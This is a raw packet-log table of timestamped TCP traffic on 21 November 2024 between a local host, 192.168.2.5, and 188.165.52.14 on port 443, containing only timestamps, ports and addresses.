Nov 21, 2024 22:12:24.800800085 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.800817013 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.806045055 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.806087971 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.806157112 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.806166887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.806210995 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.806229115 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.927556992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.927586079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.927685976 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.927716017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.927764893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.933207035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.933223009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.933278084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.933290005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.933324099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.933335066 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.970794916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.970841885 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.970879078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.970897913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.970932007 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.970953941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.976385117 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.976433039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.976460934 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.976469040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.976504087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.976522923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.982019901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.982063055 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.982089996 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.982099056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.982135057 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.982148886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.986963987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.987010956 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.987042904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.987056017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.987090111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.987107992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.992634058 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.992680073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.992701054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.992708921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.992755890 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.997984886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.998028040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.998061895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.998070002 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.998106956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.998116970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.119632959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.119652987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.119736910 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.119764090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.119807005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.125185966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.125200033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.125257015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.125291109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.125309944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.125333071 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.162874937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.162935972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.162960052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.162981987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.163002014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.163017035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.168451071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.168495893 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.168517113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.168525934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.168585062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.168585062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.174076080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.174123049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.174150944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.174159050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.174186945 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.174202919 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.179714918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.179757118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.179809093 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.179838896 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.179845095 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.179905891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.184703112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.184750080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.184770107 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.184778929 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.184807062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.184825897 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.190000057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.190042973 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.190066099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.190073967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.190103054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.190124035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.312309980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.312326908 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.312575102 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.312612057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.312664032 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.317321062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.317337036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.317421913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.317430973 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.317472935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.355346918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.355361938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.355468035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.355504990 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.355552912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.360296965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.360311031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.360388994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.360420942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.360465050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.365884066 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.365896940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.365961075 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.365993977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.366034985 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.371535063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.371548891 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.371613979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.371639967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.371675968 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.376574993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.376590014 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.376658916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.376687050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.376741886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.382504940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.382519960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.382597923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.382631063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.382679939 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.504440069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.504462957 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.504621029 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.504652977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.504702091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.509366035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.509382963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.509442091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.509450912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.509497881 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.547713995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.547732115 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.547947884 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.547969103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.548021078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.552748919 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.552762032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.552856922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.552874088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.552923918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.558309078 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.558322906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.558410883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.558419943 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.558465958 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.563930035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.563942909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.564028978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.564035892 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.564079046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.568974018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.568989038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.569052935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.569061995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.569103956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.574845076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.574862003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.574923038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.574932098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.574980974 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.696384907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.696403027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.696544886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.696582079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.696634054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.701392889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.701406956 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.701478958 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.701488972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.701503992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.701525927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.738992929 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.739006996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.739087105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.739098072 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.739141941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.744685888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.744700909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.744761944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.744776011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.744829893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.750256062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.750271082 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.750330925 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.750339985 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.750382900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.755934954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.755949020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.756030083 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.756037951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.756083012 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.760951996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.760967016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.761035919 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.761044979 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.761086941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.766207933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.766222954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.766273975 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.766304016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.766310930 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.766350985 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.888672113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.888689995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.888813019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.888828993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.890286922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.893631935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.893646955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.893824100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.893832922 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.893971920 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.931415081 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.931432009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.931504011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.931514025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.931619883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.937134027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.937149048 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.937218904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.937228918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.937392950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.942117929 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.942133904 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.942188978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.942198992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.942230940 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.942250967 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.947726011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.947741032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.947808981 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.947818041 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.947870970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.953460932 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.953475952 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.953551054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.953561068 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.953753948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.958619118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.958635092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.958715916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:25.958729982 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:25.958844900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.080730915 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.080749989 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.080858946 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.080893040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.082964897 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.086427927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.086442947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.086508036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.086518049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.086992979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.123635054 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.123652935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.123774052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.123788118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.123951912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.129319906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.129334927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.129407883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.129417896 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.130968094 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.134357929 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.134371996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.134444952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.134455919 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.134963036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.139862061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.139878035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.139945984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.139955997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.142774105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.145564079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.145581961 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.145677090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.145689011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.146960020 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.150897980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.150912046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.150991917 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.151005983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.154961109 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.272825956 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.272847891 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.272942066 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.272980928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.274965048 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.278009892 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.278040886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.278110027 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.278122902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.278569937 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.315628052 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.315651894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.315705061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.315721035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.315735102 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.315768003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.320687056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.320708036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.320782900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.320792913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.322870970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.326255083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.326275110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.326337099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.326344967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.326960087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.331911087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.331933022 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.331975937 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.331989050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.332021952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.332041979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.337589025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.337610960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.337685108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.337697029 CET	443	49824	188.165.52.14	192.168.2.5
